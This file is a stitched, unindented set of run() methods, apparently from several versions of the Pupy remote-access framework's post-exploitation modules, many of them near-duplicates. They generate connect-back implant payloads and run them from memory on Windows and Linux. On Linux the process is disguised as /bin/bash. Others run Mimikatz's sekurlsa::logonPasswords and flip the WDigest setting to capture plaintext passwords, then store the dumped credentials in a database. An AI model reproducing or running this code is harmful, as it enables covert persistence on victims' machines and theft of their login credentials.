def run(self, args):
self.success("looking for configured connect back address ...")
payload, tpl, _ = pupygen.generate_binary_from_template(
self.client.get_conf(),
self.client.desc['platform'],
arch=self.client.arch)
self.success(
"Generating the payload with the current config from {} - size={}".
format(tpl, len(payload)))
self.success("Executing the payload from memory ...")
if self.client.is_windows():
exec_pe(self,
"",
raw_pe=payload,
interactive=False,
fork=True,
timeout=None,
use_impersonation=args.impersonate,
suspended_process=args.process)
elif self.client.is_linux():
mexec(self,
payload, [],
argv0='/bin/bash',
stdout=False,
raw=True,
terminate=False)
self.success("pupy payload executed from memory")
def run(self, args):
proc_arch = self.client.desc["proc_arch"]
mimikatz_path = None
if "64" in proc_arch:
mimikatz_path = self.client.pupsrv.config.get(
"mimikatz", "exe_x64")
else:
mimikatz_path = self.client.pupsrv.config.get(
"mimikatz", "exe_Win32")
if not os.path.isfile(mimikatz_path):
self.error(
"Mimikatz exe %s not found ! please edit Mimikatz section in pupy.conf"
% mimikatz_path)
return
mimikatz_args = args.args
interactive = False
timeout = None
if not mimikatz_args:
interactive = True
timeout = 10
else:
mimikatz_args.append('exit')
exec_pe(self,
mimikatz_args,
path=mimikatz_path,
interactive=interactive,
fork=False,
timeout=timeout)
def run(self, args):
exec_pe(self,
args.args,
path=args.path,
interactive=args.interactive,
fork=args.fork,
timeout=args.timeout,
use_impersonation=args.impersonate,
suspended_process=args.suspended_process)
def run(self, args):
self.success("looking for configured connect back address ...")
res=self.client.conn.modules['pupy'].get_connect_back_host()
host, port=res.rsplit(':',1)
self.success("Generating the payload with the current config ...")
if self.client.desc["proc_arch"]=="64bit":
raw_pe=pupygen.get_edit_pupyx64_exe(self.client.get_conf())
else:
raw_pe=pupygen.get_edit_pupyx86_exe(self.client.get_conf())
self.success("Executing the payload from memory ...")
exec_pe(self, "", raw_pe=raw_pe, interactive=False, fork=True, timeout=None, use_impersonation=args.impersonate, suspended_process=args.process)
self.success("pupy payload executed from memory")
def run(self, args):
self.success("looking for configured connect back address ...")
res=self.client.conn.modules['pupy'].get_connect_back_host()
host, port=res.rsplit(':',1)
self.success("Generating the payload with the current config ...")
if self.client.desc["proc_arch"]=="64bit":
raw_pe=pupygen.get_edit_pupyx64_exe(self.client.get_conf())
else:
raw_pe=pupygen.get_edit_pupyx86_exe(self.client.get_conf())
self.success("Executing the payload from memory ...")
exec_pe(self, "", raw_pe=raw_pe, interactive=False, fork=True, timeout=None, use_impersonation=args.impersonate, suspended_process=args.process)
self.success("pupy payload executed from memory")
def run(self, args):
#usefull for bind connection
launcherType, addressPort = self.client.desc['launcher'], self.client.desc['address']
newClientConf = self.client.get_conf()
listeningAddressPort =None #For Bind mode
if self.client.is_windows() and launcherType == "bind":
listeningPort = -1
self.info('The current pupy launcher is using a BIND connection on the Windows target.')
self.info('It is listening on {0} on the target'.format(addressPort))
self.info('For the duplication, you have to choose another port and it will '
'listen on this new specific port on the target')
self.info("Be careful, you have to choose a port which is not used on the target!")
self.info("Be careful to firewall configuration/rules on the target too...")
while listeningPort==-1:
try:
listeningPort = int(input("[?] Give me the listening port to use on the target: "))
except Exception as e:
self.warning("You have to give me a valid port. Try again. ({})".format(e))
listeningAddress = addressPort.split(':')[0]
listeningAddressPort = "{0}:{1}".format(listeningAddress, listeningPort)
self.info("The new pupy instance will listen on {0} on the target".format(listeningAddressPort))
newClientConf = self.client.get_conf()
#Modify the listening port on the conf. If it is not modified,
#the payload will listen on the same port as the inital pupy launcher on the target
newClientConf['launcher_args'][newClientConf['launcher_args'].index("--port")+1] = str(listeningPort)
#Delete --oneliner-host argument, not compatible with exe payload
for pos, val in enumerate(newClientConf['launcher_args']):
if "--oneliner-host" in val:
newClientConf['launcher_args'][pos]=""
newClientConf['launcher_args'][pos+1]=""
self.success("Generating the payload...")
payload, tpl, _ = pupygen.generate_binary_from_template(
self.log,
newClientConf,
self.client.desc['platform'],
arch=self.client.arch
)
self.success("Payload generated with the current config from {} - size={}".format(tpl, len(payload)))
self.success("Executing the payload from memory ...")
if self.client.is_windows():
exec_pe(
self, "", raw_pe=payload, interactive=False,
use_impersonation=args.impersonate, suspended_process=args.process,
wait=False
)
elif self.client.is_linux():
mexec(self, payload, [], argv0='/bin/bash', raw=True)
self.success("pupy payload executed from memory")
if self.client.is_windows() and launcherType == "bind":
self.success(
'You have to connect to the target manually on {0}: '
'try "connect --host {0}" in pupy shell'.format(listeningAddressPort))
def run(self, args):
self.success("looking for configured connect back address ...")
payload, tpl, _ = pupygen.generate_binary_from_template(
self.client.get_conf(),
self.client.desc['platform'],
arch=self.client.arch
)
self.success("Generating the payload with the current config from {} - size={}".format(tpl, len(payload)))
self.success("Executing the payload from memory ...")
if self.client.is_windows():
exec_pe(
self, "", raw_pe=payload,
interactive=False, fork=True, timeout=None,
use_impersonation=args.impersonate, suspended_process=args.process
)
elif self.client.is_linux():
mexec(self, payload, [], argv0='/bin/bash', stdout=False, raw=True, terminate=False)
self.success("pupy payload executed from memory")
def run(self, args):
proc_arch=self.client.desc["proc_arch"]
mimikatz_path=None
if "64" in proc_arch:
mimikatz_path=self.client.pupsrv.config.get("mimikatz","exe_x64")
else:
mimikatz_path=self.client.pupsrv.config.get("mimikatz","exe_Win32")
if not os.path.isfile(mimikatz_path):
self.error("Mimikatz exe %s not found ! please edit Mimikatz section in pupy.conf"%mimikatz_path)
return
mimikatz_args=args.args
interactive=False
timeout=None
if not mimikatz_args:
interactive=True
timeout=10
exec_pe(self, mimikatz_args, path=mimikatz_path, interactive=interactive, fork=False, timeout=timeout)
def run(self, args):
# for windows 10, if the UseLogonCredential registry is not present or disable (equal to 0), not plaintext password can be retrieved using mimikatz.
if args.wdigest:
ok, message = self.client.conn.modules["pupwinutils.wdigest"].wdigest(args.wdigest)
if ok:
self.success(message)
else:
self.warning(str(message))
return
proc_arch = self.client.desc["proc_arch"]
mimikatz_path = None
output = ''
if "64" in proc_arch:
mimikatz_path = self.client.pupsrv.config.get("mimikatz","exe_x64")
else:
mimikatz_path = self.client.pupsrv.config.get("mimikatz","exe_Win32")
if not os.path.isfile(mimikatz_path):
self.error("Mimikatz exe %s not found ! please edit Mimikatz section in pupy.conf"%mimikatz_path)
else:
mimikatz_args = args.args
interactive = False
if not mimikatz_args:
interactive = True
else:
mimikatz_args.append('exit')
if args.logonPasswords:
mimikatz_args = ['privilege::debug', 'sekurlsa::logonPasswords', 'exit']
interactive = True
output = exec_pe(self, mimikatz_args, path=mimikatz_path, interactive=interactive)
try:
from pykeyboard import PyKeyboard
k = PyKeyboard()
k.press_key(k.enter_key)
k.release_key(k.enter_key)
except:
pass
# store credentials into the database
if output:
try:
creds = self.parse_mimikatz(output)
db = Credentials(client=self.client.short_name(), config=self.config)
db.add(creds)
self.success("Credentials stored on the database")
except:
self.error('No credentials stored in the database')
def run(self, args):
log = exec_pe(self,
args.args,
path=args.path,
interactive=args.interactive,
fork=args.fork,
timeout=args.timeout,
use_impersonation=args.impersonate,
suspended_process=args.suspended_process)
if args.log:
with open(args.log, 'wb') as output:
output.write(log)
def run(self, args):
proc_arch = self.client.desc["proc_arch"]
mimikatz_path = None
if '64' in self.client.desc['os_arch'] and "32" in proc_arch:
self.error("You are in a x86 process right now. You have to be in a x64 process for running Mimikatz.")
self.error("Otherwise, the following Mimikatz error will occur after 'sekurlsa::logonPasswords':")
self.error("'ERROR kuhl_m_sekurlsa_acquireLSA ; mimikatz x86 cannot access x64 process'")
self.error("Mimikatz has not been executed on the target")
return
if "64" in proc_arch:
mimikatz_path = self.client.pupsrv.config.get("mimikatz","exe_x64")
else:
mimikatz_path = self.client.pupsrv.config.get("mimikatz","exe_Win32")
if not os.path.isfile(mimikatz_path):
self.error("Mimikatz exe %s not found ! please edit Mimikatz section in pupy.conf"%mimikatz_path)
return
mimikatz_args = args.args
exec_pe(self, mimikatz_args, path=mimikatz_path, interactive=True)
def run(self, args):
if self.client.is_windows():
log = exec_pe(
self, args.args,
path=args.path, interactive=args.interactive,
use_impersonation=args.impersonate,
suspended_process=args.suspended_process
)
elif self.client.is_linux():
log = mexec(
self, args.path, args.args,
argv0=args.argv0 or path.basename(args.path),
interactive=args.interactive
)
def run(self, args):
if self.client.is_windows():
log = exec_pe(
self, args.args,
path=args.path, interactive=args.interactive,
fork=args.fork, timeout=args.timeout, use_impersonation=args.impersonate,
suspended_process=args.suspended_process
)
elif self.client.is_linux():
log = mexec(
self, args.path, args.args,
argv0=args.argv0 or path.basename(args.path),
interactive=args.interactive
)
if log and args.log:
with open(args.log, 'wb') as output:
output.write(log)
def run(self, args):
exec_pe(self, args.args, path=args.path, interactive=args.interactive, fork=args.fork, timeout=args.timeout, use_impersonation=args.impersonate, suspended_process=args.suspended_process)
def run(self, args):
proc_arch = self.client.desc["proc_arch"]
mimikatz_path = None
output = ''
if '64' in self.client.desc['os_arch'] and "32" in proc_arch:
self.error(
"You are in a x86 process right now. You have to be in a x64 process for running Mimikatz."
)
self.error(
"Otherwise, the following Mimikatz error will occur after 'sekurlsa::logonPasswords':"
)
self.error(
"'ERROR kuhl_m_sekurlsa_acquireLSA ; mimikatz x86 cannot access x64 process'"
)
self.error("Mimikatz has not been executed on the target")
return
# for windows 10, if the UseLogonCredential registry is not present or disable (equal to 0), not plaintext password can be retrieved using mimikatz.
if args.wdigest:
ok, message = self.client.conn.modules[
"pupwinutils.wdigest"].wdigest(args.wdigest)
if ok:
self.success(message)
else:
self.warning(str(message))
return
if "64" in proc_arch:
mimikatz_path = self.client.pupsrv.config.get(
"mimikatz", "exe_x64")
else:
mimikatz_path = self.client.pupsrv.config.get(
"mimikatz", "exe_Win32")
if not os.path.isfile(mimikatz_path):
self.error(
"Mimikatz exe %s not found ! please edit Mimikatz section in pupy.conf"
% mimikatz_path)
return
mimikatz_args = args.args
if not mimikatz_args:
mimikatz_args = ['privilege::debug', 'sekurlsa::logonPasswords']
mimikatz_args.append('exit')
if args.verbose:
self.log('Execute: ' + repr(mimikatz_args))
output = exec_pe(self,
mimikatz_args,
path=mimikatz_path,
interactive=False)
if not output:
self.warning('No output')
return
if args.verbose:
self.log(output)
creds = self.parse_mimikatz(output)
if not creds:
self.warning('No credentials found')
return
try:
# store credentials into the database
db = Credentials(client=self.client, config=self.config)
db.add(creds)
self.log(Table(creds, ['domain', 'login', 'hash', 'password']))
self.success("Credentials stored on the database")
except:
self.error('No credentials stored in the database')
def run(self, args):
log = exec_pe(self, args.args, path=args.path, interactive=args.interactive, fork=args.fork, timeout=args.timeout, use_impersonation=args.impersonate, suspended_process=args.suspended_process)
if args.log:
with open(args.log, 'wb') as output:
output.write(log)
